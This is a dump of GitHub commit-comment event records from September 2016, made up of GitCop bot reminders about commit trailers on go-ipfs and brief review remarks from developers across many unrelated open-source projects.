{"id":"4513078637","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891865,"position":null,"line":null,"path":null,"commit_id":"6b98ebeb08b3dc32bd76bd22904455a737333ac6","created_at":"2016-09-04T02:34:23Z","updated_at":"2016-09-04T02:34:23Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:34:23Z"}
{"id":"4513078669","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891866,"position":null,"line":null,"path":null,"commit_id":"30118c06730f60ff3562c7e39d67d6553a002162","created_at":"2016-09-04T02:34:24Z","updated_at":"2016-09-04T02:34:24Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:34:24Z"}
{"id":"4513078670","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891867,"position":null,"line":null,"path":null,"commit_id":"0cdc83f1036a01d71deb2aeb6434aa4f8f8159b8","created_at":"2016-09-04T02:34:24Z","updated_at":"2016-09-04T02:34:24Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:34:24Z"}
{"id":"4513078671","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18891868,"position":null,"line":null,"path":null,"commit_id":"5e7f1bb22170140298c39e35b6fe46bfb1b31362","created_at":"2016-09-04T02:34:25Z","updated_at":"2016-09-04T02:34:25Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-04T02:34:25Z"}
{"id":"4513084410","type":"CommitCommentEvent","actor":{"login":"Chai-Un"},"repo":{"name":"Chai-Un/messenger-platform"},"payload":{"comment":{"id":18891873,"position":1,"line":1,"path":"Heroku_app/node-js-getting-started","commit_id":"3d106e2bc5f74e7e5a65907e0f668bd7431df10b","created_at":"2016-09-04T02:40:38Z","updated_at":"2016-09-04T02:40:38Z","body":"bla bal"}},"created_at":"2016-09-04T02:40:38Z"}
{"id":"4513087285","type":"CommitCommentEvent","actor":{"login":"rogersb11"},"repo":{"name":"temasek/android"},"payload":{"comment":{"id":18891875,"position":null,"line":null,"path":null,"commit_id":"afcbe207a1e1f1b45f0dc137f44383138b43cb54","created_at":"2016-09-04T02:43:38Z","updated_at":"2016-09-04T02:43:38Z","body":"Enjoy your time now bro, helluva run 👏✌️"}},"created_at":"2016-09-04T02:43:38Z"}
{"id":"4513087625","type":"CommitCommentEvent","actor":{"login":"woodenchalet"},"repo":{"name":"HaoNiuBi/LeetCodeQuestions"},"payload":{"comment":{"id":18891876,"position":null,"line":null,"path":null,"commit_id":"db72b8c2e899c9518f15699ffc644c26f306c791","created_at":"2016-09-04T02:43:56Z","updated_at":"2016-09-04T02:43:56Z","body":"If you update the file name with KthSmallestElementinaBST.java the code in github will be prettier. Thanks @xx254 "}},"created_at":"2016-09-04T02:43:56Z"}
{"id":"4513087865","type":"CommitCommentEvent","actor":{"login":"McSwaggens"},"repo":{"name":"McSwaggens/linux-csgo-external"},"payload":{"comment":{"id":18891877,"position":null,"line":null,"path":null,"commit_id":"4f632013b8121a7b012e24e04c8788020ffd3a9c","created_at":"2016-09-04T02:44:11Z","updated_at":"2016-09-04T02:44:11Z","body":"Also fixes error spamming when you close the CSGO process"}},"created_at":"2016-09-04T02:44:11Z"}
{"id":"4513092971","type":"CommitCommentEvent","actor":{"login":"ivandrofly"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":18891881,"position":null,"line":null,"path":null,"commit_id":"f6e917367921d0f459c7b021996d77979e83a8b6","created_at":"2016-09-04T02:49:06Z","updated_at":"2016-09-04T02:49:06Z","body":"I think it's fixed now @marb99 \r\n\r\nthe problem was in [this-line ](https://github.com/SubtitleEdit/subtitleedit/pull/1937/files#diff-ee4505d30066048e25aeb5953902eb17R348)."}},"created_at":"2016-09-04T02:49:06Z"}
{"id":"4513095069","type":"CommitCommentEvent","actor":{"login":"zwliew"},"repo":{"name":"AdrianDC/android_device_sony_huashan"},"payload":{"comment":{"id":18891883,"position":null,"line":null,"path":null,"commit_id":"7f722b9d178c4cdddaf2d349928e64b09373ad1e","created_at":"2016-09-04T02:51:09Z","updated_at":"2016-09-04T02:51:09Z","body":"you can build the audio policy with this http://review.cyanogenmod.org/#/c/159967/"}},"created_at":"2016-09-04T02:51:09Z"}
{"id":"4513096609","type":"CommitCommentEvent","actor":{"login":"secretdataz"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":18891884,"position":null,"line":null,"path":null,"commit_id":"3607efd5c692faa783e85cc56aa69b3a209da7d9","created_at":"2016-09-04T02:52:41Z","updated_at":"2016-09-04T02:52:41Z","body":"@cydh ah, then what's the purpose of that (110/100)? We can remove that, because it always returns 1."}},"created_at":"2016-09-04T02:52:41Z"}
{"id":"4513098727","type":"CommitCommentEvent","actor":{"login":"Jahwn"},"repo":{"name":"Jahwn/JohnDavies2406A1"},"payload":{"comment":{"id":18891885,"position":null,"line":null,"path":null,"commit_id":"de65cdd8621642a072dd9aa81b6041b880c43871","created_at":"2016-09-04T02:55:03Z","updated_at":"2016-09-04T02:55:03Z","body":"Also added print statement to Player class for testing purposes."}},"created_at":"2016-09-04T02:55:03Z"}
{"id":"4513099459","type":"CommitCommentEvent","actor":{"login":"laohyx"},"repo":{"name":"laohyx/electsys"},"payload":{"comment":{"id":18891886,"position":15,"line":37,"path":"manifest.json","commit_id":"1b73fc324f6d4c009678be0d620b8248d8abafa6","created_at":"2016-09-04T02:55:49Z","updated_at":"2016-09-04T02:55:49Z","body":"@ComMouse 之所以使用*，是因为插件还有一个自动填写新视野网站的听力答案的功能。\r\n它的IP是202.120.啥的。\r\n如果这样的话，自动填写答案功能就没了。（新视野还在用嘛？）"}},"created_at":"2016-09-04T02:55:49Z"}
{"id":"4513100070","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":18891887,"position":null,"line":null,"path":null,"commit_id":"fea1edd89fe940521cd43fd2facf0efb9825fc7e","created_at":"2016-09-04T02:56:29Z","updated_at":"2016-09-04T02:56:29Z","body":"Possibly unrelated, but just an idea,\r\nHow about keeping the tables we already have, but add another dimension (to some of them) according to \r\na) square is not attacked by any pawn\r\nb) square is attacked a friendly pawn\r\nc) square is attacked a enemy  pawn\r\nd) square is attacked by enemy and friendly pawn\r\n\r\nBecause chess-wise, each time that the status of a square change according to a), b) c) or d), \r\nwe might say that \"the position has changed\" \r\n"}},"created_at":"2016-09-04T02:56:29Z"}
{"id":"4513103183","type":"CommitCommentEvent","actor":{"login":"mtwebster"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":18891890,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-04T02:59:57Z","updated_at":"2016-09-04T02:59:57Z","body":"can you provide me with the name of those layouts as installed from cinnamon-settings, as well as the flags you expect to see when you select each one?\r\n\r\nI managed to get gnomekbd flag functionality to work (as opposed to our own implementation), and installed Russian (Sweden, phonetic), and also Russian - I get a Swedish flag for the first, a russian flag for the second."}},"created_at":"2016-09-04T02:59:57Z"}
{"id":"4513103204","type":"CommitCommentEvent","actor":{"login":"matiboux"},"repo":{"name":"OliFramework/Oli"},"payload":{"comment":{"id":18891891,"position":16,"line":1243,"path":"includes/OliCore.php","commit_id":"75fa9a6b5901b69ba17b2bc009941368fadf43bc","created_at":"2016-09-04T02:59:58Z","updated_at":"2016-09-04T02:59:58Z","body":"Before this commit, the function returned a simple non-array value if the $whatVar parameter was counting one item."}},"created_at":"2016-09-04T02:59:58Z"}
{"id":"4513103205","type":"CommitCommentEvent","actor":{"login":"Hi-im-HDL"},"repo":{"name":"Hi-im-HDL/hello-world"},"payload":{"comment":{"id":18891892,"position":null,"line":null,"path":null,"commit_id":"35c977b54b0645beda7791a0949801cec5eaf00e","created_at":"2016-09-04T02:59:58Z","updated_at":"2016-09-04T02:59:58Z","body":"modified here"}},"created_at":"2016-09-04T02:59:58Z"}
{"id":"4514301398","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18894130,"position":null,"line":null,"path":null,"commit_id":"c74bdd326c11d30aec1e0f716a079cbfd9e2eb75","created_at":"2016-09-04T20:00:06Z","updated_at":"2016-09-04T20:00:06Z","body":"Where?"}},"created_at":"2016-09-04T20:00:06Z"}
{"id":"4514301431","type":"CommitCommentEvent","actor":{"login":"aprooks"},"repo":{"name":"aprooks/Orleankka"},"payload":{"comment":{"id":18894131,"position":8,"line":10,"path":"Source/FSharp.Api.Tests/ActorBuilderTests.fs","commit_id":"f8b68e06c7da3ef904d7d22e22faa1e2a3182fa7","created_at":"2016-09-04T20:00:07Z","updated_at":"2016-09-04T20:00:07Z","body":"Need empty response helper/expression"}},"created_at":"2016-09-04T20:00:07Z"}
{"id":"4514301943","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"bndw/pick"},"payload":{"comment":{"id":18894132,"position":4,"line":9,"path":"safe/safe.go","commit_id":"81c6c64e636a18c786f4bd4b26d3b2ee0d0df25f","created_at":"2016-09-04T20:00:20Z","updated_at":"2016-09-04T20:00:20Z","body":"BTW: No need to use `json:\"-\"` for unexported fields."}},"created_at":"2016-09-04T20:00:20Z"}
{"id":"4514301964","type":"CommitCommentEvent","actor":{"login":"aprooks"},"repo":{"name":"aprooks/Orleankka"},"payload":{"comment":{"id":18894133,"position":4,"line":52,"path":"Source/FSharp.Api.Tests/Orleankka.FSharp.Tests.fsproj","commit_id":"f8b68e06c7da3ef904d7d22e22faa1e2a3182fa7","created_at":"2016-09-04T20:00:20Z","updated_at":"2016-09-04T20:00:20Z","body":"Line endings???"}},"created_at":"2016-09-04T20:00:20Z"}
{"id":"4514302357","type":"CommitCommentEvent","actor":{"login":"orta"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18894134,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-04T20:00:34Z","updated_at":"2016-09-04T20:00:34Z","body":"hah, I can fix this in #530 "}},"created_at":"2016-09-04T20:00:34Z"}
{"id":"4514303564","type":"CommitCommentEvent","actor":{"login":"aprooks"},"repo":{"name":"aprooks/Orleankka"},"payload":{"comment":{"id":18894138,"position":56,"line":59,"path":"Source/FSharp.Api/ActorExpression.fs","commit_id":"f8b68e06c7da3ef904d7d22e22faa1e2a3182fa7","created_at":"2016-09-04T20:01:23Z","updated_at":"2016-09-04T20:01:23Z","body":"Adding restriction to `TMessage here. needed better obj conversion"}},"created_at":"2016-09-04T20:01:23Z"}
{"id":"4514304482","type":"CommitCommentEvent","actor":{"login":"aprooks"},"repo":{"name":"aprooks/Orleankka"},"payload":{"comment":{"id":18894141,"position":10,"line":12,"path":"Source/FSharp.Api.Tests/ActorBuilderTests.fs","commit_id":"f8b68e06c7da3ef904d7d22e22faa1e2a3182fa7","created_at":"2016-09-04T20:02:02Z","updated_at":"2016-09-04T20:02:02Z","body":"Only `OnReceive` should be required"}},"created_at":"2016-09-04T20:02:02Z"}
{"id":"4514305000","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18894142,"position":5,"line":0,"path":"app/src/main/java/com/ruesga/rview/misc/AndroidHelper.java","commit_id":"c1041313b3992246b835e247412b742057ed9fa3","created_at":"2016-09-04T20:02:19Z","updated_at":"2016-09-04T20:02:19Z","body":"Thx. I always forgot to remove testing stuff :("}},"created_at":"2016-09-04T20:02:19Z"}
{"id":"4514305302","type":"CommitCommentEvent","actor":{"login":"bmolparia"},"repo":{"name":"bmolparia/deserts"},"payload":{"comment":{"id":18894143,"position":null,"line":null,"path":null,"commit_id":"485e7f505081bfe645f2e69bb065012d23d1929a","created_at":"2016-09-04T20:02:31Z","updated_at":"2016-09-04T20:02:31Z","body":"sure"}},"created_at":"2016-09-04T20:02:31Z"}
{"id":"4514308027","type":"CommitCommentEvent","actor":{"login":"mathieujobin"},"repo":{"name":"jdeen/xkpassword"},"payload":{"comment":{"id":18894145,"position":7,"line":7,"path":".travis.yml","commit_id":"e2b84d14a05f19cee6296686cfb36c10a02cc22b","created_at":"2016-09-04T20:04:05Z","updated_at":"2016-09-04T20:04:05Z","body":"you should either use the short version 2.1, 2.2, 2.3, or use the latest revision, 2.1.10, 2.2.5, 2.3.1\r\n"}},"created_at":"2016-09-04T20:04:05Z"}
{"id":"4514308628","type":"CommitCommentEvent","actor":{"login":"lirantal"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18894146,"position":null,"line":null,"path":null,"commit_id":"7be191042066e58850899000ee02b6557d744c18","created_at":"2016-09-04T20:04:28Z","updated_at":"2016-09-04T20:04:28Z","body":"Great, thanks guys."}},"created_at":"2016-09-04T20:04:28Z"}
{"id":"4514309263","type":"CommitCommentEvent","actor":{"login":"oleg-nenashev"},"repo":{"name":"jenkinsci/jenkins"},"payload":{"comment":{"id":18894148,"position":null,"line":null,"path":null,"commit_id":"d6009e0e7607fdf5797c1bfaf075b0b0c2f70f53","created_at":"2016-09-04T20:04:53Z","updated_at":"2016-09-04T20:04:53Z","body":"done"}},"created_at":"2016-09-04T20:04:53Z"}
{"id":"4514312928","type":"CommitCommentEvent","actor":{"login":"madania"},"repo":{"name":"madania/datascience"},"payload":{"comment":{"id":18894154,"position":null,"line":null,"path":null,"commit_id":"97f10c090c3c67c84a983db11c00ca127bdb3649","created_at":"2016-09-04T20:07:12Z","updated_at":"2016-09-04T20:07:12Z","body":"Updated"}},"created_at":"2016-09-04T20:07:12Z"}
{"id":"4514313786","type":"CommitCommentEvent","actor":{"login":"LordNature"},"repo":{"name":"LordNature/Simplexity"},"payload":{"comment":{"id":18894155,"position":null,"line":null,"path":null,"commit_id":"bc4b65ab04fcea54565ebe24bb2e7c0d31a364b7","created_at":"2016-09-04T20:07:48Z","updated_at":"2016-09-04T20:07:48Z","body":"@BytewaveMLP Leave."}},"created_at":"2016-09-04T20:07:48Z"}
{"id":"4514317788","type":"CommitCommentEvent","actor":{"login":"hussein-al-Arab"},"repo":{"name":"hussein-al-Arab/SMB215-circulation-avec-raspberry-pi"},"payload":{"comment":{"id":18894158,"position":null,"line":null,"path":null,"commit_id":"3cd4f3f193729d9ed35a3497e73a4eaccbfdda29","created_at":"2016-09-04T20:10:48Z","updated_at":"2016-09-04T20:10:48Z","body":"L'idee, est de relier enserie des sensers qui serait placer a l'entree de chaque route de la ville"}},"created_at":"2016-09-04T20:10:48Z"}
{"id":"4514317906","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894159,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T20:10:52Z","updated_at":"2016-09-04T20:10:52Z","body":"The part that isn't working seems to be ``g_getenv (\"QT_STYLE_OVERRIDE\" == NULL``\r\nWhen I use only condition ``strcmp(g_getenv (\"QT_QPA_PLATFORMTHEME\"), \"qt5ct\") != 0`` it works as it should and QT_STYLE_OVERRIDE is not exported."}},"created_at":"2016-09-04T20:10:52Z"}
{"id":"4514321623","type":"CommitCommentEvent","actor":{"login":"minolo"},"repo":{"name":"minolo/naive-bayes"},"payload":{"comment":{"id":18894163,"position":17,"line":48,"path":"src/classifier.py","commit_id":"c01b370b9589f413b3b2b5ebd76f770335af4b67","created_at":"2016-09-04T20:13:15Z","updated_at":"2016-09-04T20:13:15Z","body":"Nice, using \"-t\" for both training-data and token-type :dancer::dancer::dancer::dancer::dancer: "}},"created_at":"2016-09-04T20:13:15Z"}
{"id":"4514325899","type":"CommitCommentEvent","actor":{"login":"hussein-al-Arab"},"repo":{"name":"hussein-al-Arab/SMB215-circulation-avec-raspberry-pi"},"payload":{"comment":{"id":18894167,"position":9,"line":9,"path":"README.md","commit_id":"3cd4f3f193729d9ed35a3497e73a4eaccbfdda29","created_at":"2016-09-04T20:16:04Z","updated_at":"2016-09-04T20:16:04Z","body":"L'idee, est de relier enserie des sensers qui serait placer a l'entree de chaque route de la ville"}},"created_at":"2016-09-04T20:16:04Z"}
{"id":"4514325903","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18894168,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T20:16:04Z","updated_at":"2016-09-04T20:16:04Z","body":"@mstembera \r\nNot in all cases. \r\nFor example if White has pawn on a2 and a6, 2 connected groups are created.\r\nbut maybe these are connected via b3 c4 and b5.\r\n\r\n@lucabrivio \r\na) shift_bb does not currently implement SHIFT_E and SHIFT_W (but this is easy to fix\r\nb) Step # 2 is a bit heavy. \r\n\r\nHere is a draft version. I did not even try to compile it yet, But it might give some ideas.\r\nhttps://github.com/Rocky640/Stockfish/commit/d6b4dea7cb3cc15383ff02310ab166825ae69285"}},"created_at":"2016-09-04T20:16:04Z"}
{"id":"4514326857","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18894170,"position":53,"line":1474,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-04T20:16:46Z","updated_at":"2016-09-04T20:16:46Z","body":"Was genau hat denn da vorher nicht funktioniert?"}},"created_at":"2016-09-04T20:16:46Z"}
{"id":"4514328061","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18894173,"position":215,"line":3419,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-04T20:17:43Z","updated_at":"2016-09-04T20:17:43Z","body":"sollten wir wohl besser CRCOFF benennen."}},"created_at":"2016-09-04T20:17:43Z"}
{"id":"4514332087","type":"CommitCommentEvent","actor":{"login":"petercolberg"},"repo":{"name":"hlandau/goutils"},"payload":{"comment":{"id":18894180,"position":218,"line":218,"path":"clock/clock.go","commit_id":"26f8bb04bc86940feb97334dd5bb515f06e2b621","created_at":"2016-09-04T20:20:41Z","updated_at":"2016-09-04T20:20:41Z","body":"Does this additional copyright/license comment still apply?"}},"created_at":"2016-09-04T20:20:41Z"}
{"id":"4514335920","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894184,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T20:23:43Z","updated_at":"2016-09-04T20:23:43Z","body":"Did you remove **QT_STYLE_OVERRIDE** from the file when you started it? Let me rethink it ..."}},"created_at":"2016-09-04T20:23:43Z"}
{"id":"4514335922","type":"CommitCommentEvent","actor":{"login":"lozy219"},"repo":{"name":"Echx/Dalton"},"payload":{"comment":{"id":18894185,"position":null,"line":null,"path":null,"commit_id":"cb3bf4bec7c132b696da873a3d8c032848530f45","created_at":"2016-09-04T20:23:43Z","updated_at":"2016-09-04T20:23:43Z","body":"LOL 现学现用"}},"created_at":"2016-09-04T20:23:43Z"}
{"id":"4514337744","type":"CommitCommentEvent","actor":{"login":"null09264"},"repo":{"name":"Echx/Dalton"},"payload":{"comment":{"id":18894186,"position":null,"line":null,"path":null,"commit_id":"cb3bf4bec7c132b696da873a3d8c032848530f45","created_at":"2016-09-04T20:25:09Z","updated_at":"2016-09-04T20:25:09Z","body":"👹"}},"created_at":"2016-09-04T20:25:09Z"}
{"id":"4514337766","type":"CommitCommentEvent","actor":{"login":"RezzedUp"},"repo":{"name":"Ktar5/Info-Board"},"payload":{"comment":{"id":18894187,"position":null,"line":null,"path":null,"commit_id":"c57fe5edd93dec131714a4ccf4617eb9d01fc59a","created_at":"2016-09-04T20:25:09Z","updated_at":"2016-09-04T20:25:09Z","body":"woopsies"}},"created_at":"2016-09-04T20:25:09Z"}
{"id":"4514340202","type":"CommitCommentEvent","actor":{"login":"munjeni"},"repo":{"name":"munjeni/DSL-2740B-OSCAM"},"payload":{"comment":{"id":18894189,"position":null,"line":null,"path":null,"commit_id":"261b43cce4c244445187c02cb11af722dd29e0fe","created_at":"2016-09-04T20:27:02Z","updated_at":"2016-09-04T20:27:02Z","body":"Hi, that's not an app, that's php port of the cccam protocol, I can't port it to exe since that reqire whole  programingmming..."}},"created_at":"2016-09-04T20:27:02Z"}
{"id":"4514340468","type":"CommitCommentEvent","actor":{"login":"Procrat"},"repo":{"name":"paretje/dotfiles"},"payload":{"comment":{"id":18894190,"position":null,"line":null,"path":null,"commit_id":"a05db30e0b9f0b8e067a8704ac4c19817d08c5c7","created_at":"2016-09-04T20:27:14Z","updated_at":"2016-09-04T20:27:14Z","body":"You might want to consider the package `pip-review`. I think it does what you want without needing a `requirements.txt`."}},"created_at":"2016-09-04T20:27:14Z"}
{"id":"4514344100","type":"CommitCommentEvent","actor":{"login":"porkybrain"},"repo":{"name":"brunocodutra/metal"},"payload":{"comment":{"id":18894192,"position":null,"line":null,"path":null,"commit_id":"75cd1c2edba944ad962182606ad3dc44a5df6f19","created_at":"2016-09-04T20:30:01Z","updated_at":"2016-09-04T20:30:01Z","body":"Nice, I was telling the guys at work this idea will help you more than brigand in the short term. However I think there is much more potential in this pattern"}},"created_at":"2016-09-04T20:30:01Z"}
{"id":"4514345543","type":"CommitCommentEvent","actor":{"login":"DardBrinza"},"repo":{"name":"DardBrinza/AuthMeReloaded"},"payload":{"comment":{"id":18894198,"position":null,"line":null,"path":null,"commit_id":"38736c3efe0f0635dd78375de853c1561f592aaf","created_at":"2016-09-04T20:31:03Z","updated_at":"2016-09-04T20:31:03Z","body":"Sure, no problem :+1: "}},"created_at":"2016-09-04T20:31:03Z"}
{"id":"4514347222","type":"CommitCommentEvent","actor":{"login":"rotanid"},"repo":{"name":"MISP/MISP"},"payload":{"comment":{"id":18894200,"position":null,"line":null,"path":null,"commit_id":"f9e6180c064a753c8075c818cc9d3e5c85483544","created_at":"2016-09-04T20:32:20Z","updated_at":"2016-09-04T20:32:20Z","body":"thanks ;)"}},"created_at":"2016-09-04T20:32:20Z"}
{"id":"4514348644","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18894201,"position":null,"line":null,"path":null,"commit_id":"df66d6ef4a8c1ba4a30aab3f42bf5ebf3f70ffda","created_at":"2016-09-04T20:33:22Z","updated_at":"2016-09-04T20:33:22Z","body":"Which file do you mean? I don't think ``csm_util_setenv`` actually writes the var to a file, if you mean that.\r\nThat assuption is also supported by the fact that when you remove the function and launch a new session ``echo $QT_STYLE_OVERRIDE`` will return empty even when in the session before it was exported ``gtk`` if you see what I mean ..."}},"created_at":"2016-09-04T20:33:22Z"}
{"id":"4514348855","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18894202,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T20:33:31Z","updated_at":"2016-09-04T20:33:31Z","body":"Fair enough. Further doc updates pushed. The above issue is minor imho, so I skip it for now. Thanks.\r\n\r\n"}},"created_at":"2016-09-04T20:33:31Z"}
{"id":"4514351149","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18894206,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T20:35:03Z","updated_at":"2016-09-04T20:35:03Z","body":"(I skip it in a similar manner how I skip asking you doing \"last mile\" changes to your patches, like these ones, and taking doing them myself instead.)\r\n"}},"created_at":"2016-09-04T20:35:03Z"}
{"id":"4514352553","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18894208,"position":53,"line":1474,"path":"FHEM/00_SIGNALduino.pm","commit_id":"b760d47fc6af076cef870413706636e5d63cc556","created_at":"2016-09-04T20:36:02Z","updated_at":"2016-09-04T20:36:02Z","body":"Der receiver wurde nicht disabled.\r\nIm log sah es so aus:\r\n```\r\n2016.09.04 13:35:44.563 1: sduino/init: /dev/serial/by-id/usb-FTDI_FT232R_USB_UART_A50285BI-if00-port0@57600\r\n2016.09.04 13:35:44.563 5: sduino SW: XQ\r\n2016.09.04 13:35:44.573 3: sduino device opened\r\n```\r\nDas XQ wurde gesendet bevor das device opened war"}},"created_at":"2016-09-04T20:36:02Z"}
{"id":"4514353197","type":"CommitCommentEvent","actor":{"login":"ArekZc"},"repo":{"name":"ArekZc/node-practice"},"payload":{"comment":{"id":18894211,"position":null,"line":null,"path":null,"commit_id":"55defcf3412186aa22a64a6802fd2a238cc032a0","created_at":"2016-09-04T20:36:31Z","updated_at":"2016-09-04T20:36:31Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;wO8QGOoa&#x2F;2-add-coding-standards-task-to-npm-scripts\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Add coding standards task to npm scripts</a>"}},"created_at":"2016-09-04T20:36:31Z"}
{"id":"4514353305","type":"CommitCommentEvent","actor":{"login":"silverbucket"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18894212,"position":35,"line":120,"path":"src/webfinger.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-04T20:36:38Z","updated_at":"2016-09-04T20:36:38Z","body":"Ah, so you mean just change it to something like 'resource not found' ?"}},"created_at":"2016-09-04T20:36:38Z"}
{"id":"4514355098","type":"CommitCommentEvent","actor":{"login":"alexdom"},"repo":{"name":"seanbechhofer/raspberrypi"},"payload":{"comment":{"id":18894213,"position":null,"line":null,"path":null,"commit_id":"3f17e760ef896da6d4c1af998076e649dd8d5f65","created_at":"2016-09-04T20:37:53Z","updated_at":"2016-09-04T20:37:53Z","body":"Thanks!"}},"created_at":"2016-09-04T20:37:53Z"}
{"id":"4514360966","type":"CommitCommentEvent","actor":{"login":"jshemas"},"repo":{"name":"jshemas/openGraphScraper"},"payload":{"comment":{"id":18894221,"position":null,"line":null,"path":null,"commit_id":"218385276f1efb68529e25778e503cc3b9b6925f","created_at":"2016-09-04T20:42:03Z","updated_at":"2016-09-04T20:42:03Z","body":"Yep! Sorry about that. This is now part of version 2.3.0"}},"created_at":"2016-09-04T20:42:03Z"}
